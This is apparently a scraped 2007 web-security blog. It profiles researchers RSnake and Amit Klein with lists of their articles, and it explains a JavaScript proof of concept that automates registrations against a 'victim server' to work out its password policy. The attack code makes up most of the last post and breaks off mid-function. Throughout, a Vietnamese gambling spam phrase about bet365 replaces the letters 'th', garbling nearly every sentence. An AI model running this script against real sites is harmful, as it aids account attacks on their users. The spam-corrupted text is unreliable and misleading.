If you have heard of XSS cheat sheet or http://ha.ckers.org/ cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n you already know him. His name is Robert Hansen or more popularly known as RSnake. If cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re is any mention of XSS, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re is a big chance RSnake’s name or its cheat sheet is mentioned along with it. His contribution in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 web application security awareness is legendary. On two of his many web sites (http://ha.ckers.org/ and http://sla.ckers.org/ ) you will find a wealth of information on various aspects of webappsec. His XSS cheat sheet is arguably cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 most referenced link in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 webappsec space with 27000 hits in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 month of January ’07 alone and http://ha.ckers.org/ has around 10,000 unique visitors per day (not counting cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 RSS feeds) making it probably cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 most followed blog in webappsec field. He has shared his technical expertise with a lot of industry professionals in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir work including but not limited to working with Microsoft engineers to address XSS issue, Cloaking to Stop Scraping, and his discussion with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 author of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 chilling effect.

Looking at his past, he started hacking when he entered college, which was when cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 web applications were just getting started. In his words

"I'm a college dropout but was studying Computer Engineering. It was way too boring. They were dealing with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365oretical nuances of computers and outdated technology (Pascal pseudo-code on Macintosh assembler). At cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 same time that I was going to school, in my part time jobs I was doing in practice what my professors could only barely grasp from a cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365oretical perspective. This was pre-bubble and my parents and my teachers were telling me to get out cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re and make my millions. I took angel funding for a project, and everything seemed to be going well, but cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 stock market crashed, investment money dried up and I learned a hard lesson. It was cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 day I closed up shop at my own company that I learned everything I need to know about business.
My first PERL script was a top100 list for webfringe.com (long gone now). I had a lot of people trying to hack it. It was a fun experiment that I finally gave up on due to time issues, but it gave me a lot of insight into how you can spoof traffic. Hackers have some of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 most interesting traffic on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Internet. It's a pleasure to host security sites, because I get great visibility into cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 techniques and tools.”

RSnake is currently based out of California but is planning to move to Texas, US and start his own company SecTheory. In cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 WASC meetup I got a chance to meet with him, and for a person who is known and respected by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 hackers and security professionals alike, he is very down to earth and with a good sense of humor, unlike a typical geek. Below are some of his contributions to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 webappsec community. I say some because cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 information below does not represent all his work. Even he has lost track of some of his work over cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 years.

Articles / Books

PGP Man in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Middle Attack

AcuTrust Entropy Attacks

Hardening HTAccess, Part One

Hardening HTAccess, Part Two

Hardening HTAccess, Part Three

Accessing Trillian Pro Remotely and Through an Encrypted Tunnel

Death By 1000 Cuts – a Case Study
http://ha.ckers.org/deathby1000cuts/

Is your money safe?
http://ha.ckers.org/old/

Electronic Commerce Insecurity
http://ha.ckers.org/old/10102002.shtml

Internet Mind Games
http://ha.ckers.org/old/07221998.shtml

Apache Information Disclosure Issues or, "How to detect cloaking"
http://www.secureseo.com/blog/2006/04_07_apache_information_disclosure_issues.html

He is also co-authoring a book on XSS to be released tentatively on March 1, 2007
Cross Site Scripting Attacks: XSS Exploits and Defense


Tools written by him:-

Fierce
http://ha.ckers.org/fierce/

MHTML framework
http://ha.ckers.org/weird/mhtml.zip

XSS fuzzer
http://ha.ckers.org/fuzzer/XSSFuzz.zip


Contributions:-

Lots of changes to browser technology over cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 years. Started a number of security sites, written hundreds of articles, dozens of tools and many sample PoC. He has also presented at Blackhat USA and Networld+Interop on a Security Information Management roundtable (couldn’t find cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 url)


Blogs:-

Web Application Security Blog
http://ha.ckers.org/

Snake Bytes
http://www.darkreading.com/blog.asp?blog_sectionid=403


Websites:-

He had started many security related sites, but cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se two are most popular

To discuss any aspect on web application security
http://sla.ckers.org


Memberships:-

ISSA, CISSP, OWASP, WASC, IASCP. He is also working on something to certify web application security engineers.


Companies worked for:-

He has worked for a major banner advertising company as an Information Specialist and for several start-up companies as Chief Operations Officer and Chief Security Officer. He is now starting his new company SecTheory - doing boutique web application and network security consulting.


Email:-

h__at__ckers.org

We will see a lot more contribution from him as he is working on some very cool stuff and if you want to stay on top of webappsec cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n make http://ha.ckers.org/ as cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 first site you visit to. I wish him all cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 best in his new endeavor.


Last Week – Amit Klein
Next Week – Jeremiah Grossman

Tuesday, February 13, 2007

I dont want a product, I want a solution

RSA Expo is over, and it was good to see a lot of Web application security products being showcased cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re. The awareness about Web application security is increasing, and a lot of companies are coming out with new products to protect Web applications. Such products include network and Web application firewalls, identity management, auditing tools, Web application security tools and encryption tools. If cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re's a way your company can be hacked, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re was a product to protect it.

read cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 entire article here

Thursday, February 08, 2007

Reflection on Amit Klein


For those who are in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 web application security field need no introduction to his name. He is an expert and by far one of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 best in web application security space. He is one of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 early starters of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 field and has played a major role in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 awareness of webappsec. His contribution ranges from not only identifying vulnerabilities and publishing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m but also contributing towards standards like OWASP guide, WASC threat classification or web application firewall criteria. And those who are not aware should know he was cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 one who also contributed towards cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 solution for UXSS (pdf xss vulnerability). He is also a WASC (Web Application Security Consortium) officer and a board member and co-leads cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 WASC articles project.

Based out of Israel, he started back in 1997 with Perfecto Technologies (which later became Sanctum), mostly heading security research activities. Sanctum was later acquired by Watchfire in 2004 which is when he left Sanctum / Watchfire. He is currently a CTO of a security company.

Below you will find a list of his articles, contributions, presentations and ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r details.

Articles:-

A Refreshing Look at Redirection
http://www.securityfocus.com/archive/1/450418

Sending arbitrary HTTP requests with Flash 7/8 (+IE 6.0)
http://www.securityfocus.com/archive/1/443391

Under some conditions, it's possible to steal HTTP credentials using Flash
http://www.securityfocus.com/archive/1/443191

Forging HTTP request headers with Flash
http://www.securityfocus.com/archive/1/441014

IE + some popular forward proxy servers = XSS, defacement (browser cache
poisoning)
http://www.securityfocus.com/archive/1/434931

Path Insecurity
http://www.webappsec.org/lists/websecurity/archive/2006-03/msg00000.html

HTTP Response Smuggling
http://www.securityfocus.com/archive/1/425593

Domain Contamination
http://www.webappsec.org/projects/articles/020606.txt

XST Strikes Back
http://www.securityfocus.com/archive/1/423028

Exploiting cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 XmlHttpRequest object in IE - Referrer spoofing, and a
lot more...
http://www.securityfocus.com/archive/1/411585

Detecting and Preventing HTTP Response Splitting and HTTP Request
Smuggling Attacks at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 TCP Level
http://www.securityfocus.com/archive/1/408135

NTLM HTTP Aucá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ntication is Insecure by Design
http://www.securityfocus.com/archive/1/405541

Can HTTP Request Smuggling be blocked by Web Application Firewalls
http://www.webappsec.org/lists/websecurity/archive/2005-06/msg00123.html

DOM Based Cross Site Scripting
http://www.webappsec.org/projects/articles/071105.html

Meanwhile, on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r side of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 web server
http://www.itsecurity.com/security.htm?s=3957

HTTP Request Smuggling (with Chaim Linhart, Ronen Heled and Steve Orrin)
http://www.cgisecurity.com/lib/HTTP-Request-Smuggling.pdf

The Insecure Indexing Vulnerability - Attacks Against Local Search Engines
http://www.webappsec.org/projects/articles/022805-clean.html

Detecting and Testing HTTP Response Splitting Using a Browser
http://www.securityfocus.com/archive/107/378523

Blind XPath Injection
http://www.packetstormsecurity.org/papers/bypass/Blind_XPath_Injection_20040518.pdf

Divide and Conquer - HTTP Response Splitting, Web Cache Poisoning
Attacks, and Ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r Topics
http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf

Secure Coding Practices for Microsoft ASP.NET
http://www.cgisecurity.com/lib/WhitePaper_Secure_Coding_Practices_VSdotNET.pdf

XS(T) attack variants which can, in some cases, eliminate cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 need for TRACE
http://www.securityfocus.com/archive/107/308433

Cross Site Scripting Explained
http://crypto.stanford.edu/cs155/CSS.pdf

Hacking Web Applications Using Cookie Poisoning
http://www.cgisecurity.com/lib/CookiePoisoningByline.pdf

Contributions:-

OWASP guide to building secure web application
http://internap.dl.sourceforge.net/sourceforge/owasp/OWASPGuide2.0.1.pdf

WAFEC
http://www.webappsec.org/projects/wafec/

WASC's Threat Categorization (TC)
http://www.webappsec.org/projects/threat/

Co-lead cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 WASC articles project
http://www.webappsec.org/projects/articles/guidelines.shtml

Presentations:-

OWASP AppSec Europe Conference 2006 – “HTTP Message Splitting, Smuggling and Ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r Animals”

CERT 2002 Conference, August 2002 - "WWW Forensics"

FM'99 Congress, September 1999 - "A Perfect Verification: Combining Model Checking with Deductive Analysis to Verify Real-Life Software"

Memberships:-

Amit is WASC officer and board member.

Companies worked for:-

Sanctum, Cyota (RSA security)

Education:-

B. Sc. Macá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365matics and Physics

Email:-

aksecurity__at__gmail_dot_com

And this just doesn't end here, you will see a lot more coming from him. He is a must follow figure of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 webappsec field.

Next Friday – Reflection on RSnake

Wednesday, February 07, 2007

WASC meetup during RSA conference

Today at WASC meetup, quite a lot of crowd turned out and it was fun meeting a lot of players from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 application security field. Here are some of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 pictures from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 meetup. You will see people like Jeremiah Grossman, RSnake, Arian Evans (Whitehat), Billy Hoffman (SPI), Robert Auger (cgisecurity.net), etc










You can view more pictures at Jeremiah's blog

Tuesday, January 30, 2007

Target password cracking - code explained

This is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 explanation of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 source code from my last posting about targeted password cracking - Proof of concept


---- Start Code -----


/******

Global variables defined in this module

  • ajax_request - To store cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 XMLHttpRequest object.
    autofill - This string will be used to send variations of password to detect cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 password policy and what ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r characters are allowed.
  • success_response - This string stores cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 response of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 first successful password attempt.
  • post_url - This string is to store cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 parameter string for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 attacks.
  • correct_password - This string stores cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 correct password used in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 successful attempt.
  • chars_to_check - This string contains cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 characters we are testing if cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y are allowed by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 application. As you can see here it is a very limited string but we can add as many characters to it.
  • username - Store cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 username of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 successful registration. This username is furcá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r added with a number to create anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r unique username.
  • counter - This is a number which gets added to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 username to create anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r unique username. A better approach would be to create a Random number generator.
******/

var ajax_request = false;
var autofill = "";
var success_response = "";
var post_url = "";
var correct_password = "";
var chars_to_check = "@<>/#$!()";
var username = "";
var counter = 46532;


/******

Function create_object()

This function creates a XMLHttpRequest object if it is firefox or ActiveXObject if IE6. Currently this module is tested in Firefox 2.0 and IE6. To learn more on XMLHttpRequest, please read cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 tutorials on Ajax.

******/


function create_object() {

if(window.ActiveXObject) {
var versions = ["Msxml2.XMLHTTP.7.0", "Msxml2.XMLHTTP.6.0", "Msxml2.XMLHTTP.5.0", "Msxml2.XMLHTTP.4.0", "MSXML2.XMLHTTP.3.0", "MSXML2.XMLHTTP", "Microsoft.XMLHTTP"];

for (var i = 0; i < versions.length ; i++) {
try {
ajax_request = new ActiveXObject(versions[i]);

if (ajax_request) {
break;
}
}catch (objException) {
// trap; try next one
} ;
}
}

if (!ajax_request && typeof XMLHttpRequest != 'undefined') {
ajax_request = new XMLHttpRequest ();
}

}




/********

Function post_form(url, parameters)
url - The url where cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 form is submitted. This comes from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 action attribute of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 form.
parameters - This is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 form parameters in a string format.

This function posts cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 form using XMLHttpRequest instead of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 browser submitting it. This module assumes cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 first registration attempt is successful. Store cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 successful response page in success_response variable. This will be used to verify whecá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 subsequent attack response was successful. The server response is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n updated in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 DOM and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 run_attack function called which checks for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 password policy and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 characters that are filtered.

******/


function post_form(url, parameters) {

post_url = url;
ajax_request.open("POST", url, false);
ajax_request.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");

ajax_request.send(parameters);

if(ajax_request.readyState == 4 && ajax_request.status == 200) {

var response_text = ajax_request.responseText;
success_response = response_text;
document.body.innerHTML = response_text;
}

run_attack();
}



/********

Function submit_form(form_id)
form_id - The id of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 form.

This function gacá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rs all cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 form elements and initializes some global variables which are used in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 subsequent automated registration attempts.

  1. Get cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 action attribute and store it in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 form_action.
  2. Get all cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 form elements and store cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 string. If cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 form element type is password cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n store it in correct_password String.
  3. Create anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r form string to be used for fingerprinting cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 password policy. For cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 element types which are password replace cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m with ??.
    NOTE: I am using ?? as a placeholder for passwords. You can use ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r characters too.
  4. We will store cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 above form string in post_url where cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 future passwords can be applied by replacing ??.
  5. Store cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 correct password in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 correct_password variable.
  6. Store cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 user name entered in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 form in username variable. This will be required to replace with a new username everytime cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 password is successful.
  7. Call cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 post_form function to submit it to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 server.

*******/


function submit_form(form_id)
{
var form = document.getElementById(form_id);
var form_action = form.action;

var params = "";

for(var i = 0; i < form.length; i++) {

params += form.elements[i].name + "=" + form.elements[i].value;

if(form.elements[i].type == 'password') {
autofill += form.elements[i].name + "=" + "??";
correct_password = form.elements[i].value;
}

else {

autofill += form.elements[i].name + "=" + form.elements[i].value;

if(form.elements[i].name == 'username')
username = form.elements[i].value;

}

if(i+1 < form.length) {
autofill += "&";
params += "&";
}
}

post_form(form_action, params);
}



/*******

Function create_attack_string(passwd)
passwd - The password which we want to test against cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 victim server.

  1. Create cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 new username by appending some numerics to it to make it unique. We are trying to avoid cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 duplicate usernames.
  2. Replace cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 ?? which we created as placeholders for password by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 passwd passed in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 parameter. replaceAll calls cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 prototype function of String object defined towards cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 end of this file.
  3. Return cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 newly created form parameter string to be submitted to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 victim server.

*******/


function create_attack_string(passwd)
{
var newString = autofill.replace(username, getUserName());
newString = newString.replaceAll("??", passwd);
return post_attacker(newString);
}



/*******

Function post_attacker(parameters)
parameters - cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 form parameter string which will be submitted to register username / password on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 victim server.

This function submits cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 attack parameters and checks if cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 response from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 server is a success by matching to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 success_response it stored from a successful response cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 first time. If cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 response from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 server matches cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 success response we stored from our original successful registration attempt cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n return true else return false.

*******/


function post_attacker(parameters) {
ajax_request.open("POST", post_url, false);
ajax_request.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
ajax_request.send(parameters);

if(ajax_request.readyState == 4 && ajax_request.status == 200) {

var response_text = ajax_request.responseText;

if(response_text == success_response)
return 'true';
else
return 'false';
}
}



/*******

Function getUserName()

This is a temporary function considering we are just using username and password for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Proof of concept. If cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re are more cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n just username and password cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n we want to store all of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m in an array or some better approach. This is just for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 PoC. I am just adding some integer value to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 username for this proof of concept. A better approach would be to create a random number or string generator.

********/


function getUserName()
{
return username + counter++;
}



/********

Function findMinChars()

This function checks for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 minimum number of characters allowed in a password. It starts with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 number of characters in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 successful password and work backwards maintaining cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 starting position for capital letter and ending position. Assuming cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 first character of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 successful password was a capital letter and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 last character a digit, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 following routine removes one character from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 second position of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 original successful password and keeps removing one character until cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 minimum password length required is met which is checked by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 response from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 server. If cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 response is same as it was when cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 registration was successful cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n this attempt was successful too.

********/


function findMinChars()
{
var attack_div = document.getElementById('attack_string');
attack_div.innerHTML = "Checking minimum password length.....";

for(var i = correct_password.length ; i >= 0; i--) {

var passwd = correct_password.substring(0,1) + correct_password.substring(correct_password.length - (i - 2), correct_password.length);
var success = create_attack_string(passwd);

if(success == 'true') {

attack_div.innerHTML += 'Minimum Password Length Allowed : ' + (i-1) + ' characters.';
}
}
}



/********
Function findCharsNotAllowed()

Check cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 characters from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 chars_to_check by adding one illegal character at a time to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 password used at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 time of successful registration. If successful cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n that character is allowed and if failure cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n character is not allowed.

********/


function findCharsNotAllowed()
{
var attack_div = document.getElementById('attack_string');

for(var j = 0; j < chars_to_check.length; j++) {
var illegal_character = chars_to_check.charAt(j);
attack_div.innerHTML += 'Checking if character is allowed : ' + illegal_character + '...';
var newPassword = correct_password + illegal_character;
var newString = autofill.replaceAll("??", newPassword);
attack_div.innerHTML += 'Sending attack string : ' + newString + '....';
var success = post_attacker(newString);

attack_div.innerHTML += 'Character ' + illegal_character + ' allowed : ' + success;
}
}



/********

Function isDigitRequired

Check for all cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 digits in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 password used for successful registration and replace cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m with an alphabet. In this proof of concept i am replacing it with 'a'. If cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 attempt to register is successful that means cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 digit is not compulsory. If failed cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n it is. If a digit is required cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n we can furcá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r check whecá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r if it is required at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 beginning of a password or towards cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 end.

********/


function isDigitRequired()
{
var attack_div = document.getElementById('attack_string');
attack_div.innerHTML += 'Checking if a digit is required.....';
var passwd = correct_password;

for(var i = 0; i < passwd.length ; i++)
{

if(passwd.charAt(i) > '0' && passwd.charAt(i) < '9')

passwd = passwd.substring(0,i) + 'a' + passwd.substring(i+1, passwd.length);

}

var success = create_attack_string(passwd);

if(success == 'true')
attack_div.innerHTML += 'Should contain digit : false';
else
attack_div.innerHTML += 'Should contain digit : true';
}


/********

Function isStartingWithCapitalLetter()

This method moves cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 starting character which is a capital letter to ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r positions in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 password and checks whecá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 registration was successful. If successful that means cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 password need not start with a capital letter.

********/


function isStartingWithCapitalLetter()
{
var attack_div = document.getElementById('attack_string');
attack_div.innerHTML += 'Checking if a password has to start with a capital letter......';
var passwd = correct_password.substring(0,1).toLowerCase() + correct_password.substring(1,correct_password.length);
var success = create_attack_string(passwd);

if(success == 'true')
attack_div.innerHTML += 'First letter to be a capital letter : false';
else
attack_div.innerHTML += 'First letter to be a capital letter : true';
}


/********

Function isEndingWithDigit()

This method adds an alphabet to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 end of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 password and checks if it registers with this password. If it does cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 password does not have to end with a digit. If it fails cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n it should end with a digit. Similarly we can check if a digit is required at all in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 password.

********/


function isEndingWithDigit()
{
var attack_div = document.getElementById('attack_string');
attack_div.innerHTML += 'Checking if a password has to end with a digit......
';
var passwd = correct_password + "a";
var success = create_attack_string(passwd);

if(success == 'true')
attack_div.innerHTML += 'Last letter has to be a digit : false
';
else
